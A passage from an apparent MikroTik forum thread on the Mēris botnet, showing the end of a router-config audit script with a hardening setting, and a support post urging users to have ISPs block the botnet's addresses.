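set allowed-interface-list=LAN
"""
```

Feed `audit()` the text of a real `/export` (or `/export verbose`); an empty result means none of the quoted indicators were found and the five default-config settings are present.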
 
normis
MikroTik Support
Topic Author
Posts: 25031
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mēris botnet information

Fri Sep 17, 2021 11:21 am

We have updated the article on our blog. Please work with your ISPs to block the addresses the botnet is using:
https://blog.mikrotik.com/security/meris-botnet.html